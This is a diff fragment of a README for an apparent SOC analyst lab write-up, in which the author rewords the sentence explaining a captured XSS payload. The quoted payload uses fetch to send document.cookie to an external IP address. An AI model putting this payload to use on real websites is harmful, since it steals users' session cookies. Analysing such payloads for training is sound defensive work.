mohamedbrek/CyberLabs-SOC-L1-RetailBreach/README.md

 <script>fetch('http://111.224.180.128/' + document.cookie);</script>
 ```

-Pretty classic cookie-stealing XSS — grab `document.cookie` and send it straight to the attacker's own IP.
+The payload attempts to access `document.cookie` and send the result to the attacker's IP address.

 ![Task 3 - XSS Payload](screenshots/Task-03-XSS-payload-01.png)